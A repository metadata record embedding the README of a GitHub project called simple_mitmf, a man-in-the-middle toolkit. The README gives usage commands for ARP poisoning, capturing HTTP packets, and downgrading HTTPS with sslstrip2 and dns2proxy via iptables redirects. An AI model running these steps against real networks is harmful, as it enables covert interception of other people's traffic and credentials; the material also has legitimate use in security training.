{"id":16109723,"url":"https://github.com/knid/simple_mitmf","last_synced_at":"2025-06-18T15:38:48.695Z","repository":{"id":185811313,"uuid":"453950378","full_name":"knid/simple_mitmf","owner":"knid","description":"a simple mitmf framework","archived":false,"fork":false,"pushed_at":"2022-02-03T16:21:02.000Z","size":4,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-12T11:12:40.052Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knid.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-01-31T09:47:50.000Z","updated_at":"2022-01-31T09:48:44.000Z","dependencies_parsed_at":null,"dependency_job_id":"9cf286fb-5f83-4d04-b820-dd47f33ccc65","html_url":"https://github.com/knid/simple_mitmf","commit_stats":null,"previous_names":["knid/simple_mitmf"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knid%2Fsimple_mitmf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knid%2Fsimple_mitmf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knid%2Fsimple_mitmf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knid%2Fsimple_mitmf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knid","download_url":"https://codeload.github.com/knid/simple_mitmf/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247437792,"owners_count":20938790,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-09T19:34:19.020Z","updated_at":"2025-04-06T05:21:01.445Z","avatar_url":"https://github.com/knid.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Simple Mitmf Framework\n\n**Man-In-The-Middle** Software Made Using Scapy with Python3\n\n## Installing Required Packages:\n```\n- pip3 install scapy\n- pip3 install scapy_http\n\nOR \n\n- pip3 install -r requirements.txt\n```\n## IP Forward \n\n```\n- echo 1 \u003e /proc/sys/net/ipv4/ip_forward\n```\n\n\n\n# Arp_Poison.py\n\n\u003e- Performs **ARP Poisoning** by Sending ARP Packets.\n\n## Usage :\n\n```\n- python3 arp_poison.py -t x.x.x.x -g x.x.x.x\n```\n\n\n# Listener.py\n\n\u003e - Captures and Prints All **HTTP** Packets After ARP Poisoning.\n\n## Usage : \n```\n- python3 listener.py -i wlan0\n```\n\nInstead of **Listener.py** You Can Use Any Network Listening Software. Ex: **Wireshark**\n\n# Bypass HTTPS:\n\n## Downloading Required Applications:\n\n```\ngit clone https://github.com/byt3bl33d3r/sslstrip2\ngit clone https://github.com/singe/dns2proxy\n```\n\n## IP Table Configuration:\n\n**For SSLStrip:**\n\n```\niptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000\n```\n**For DNS2Proxy:**\n```\niptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53\n```\n\n## Usage : \n```\n- echo 1 \u003e /proc/sys/net/ipv4/ip_forward\n\n- python3 arp_poison.py -t x.x.x.x -g x.x.x.x\n\n- python3 sslstrip.py\n\n- python3 dns2proxy.py\n\n- python3 listener.py -i wlan0\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fknid%2Fsimple_mitmf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fknid%2Fsimple_mitmf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fknid%2Fsimple_mitmf/lists"}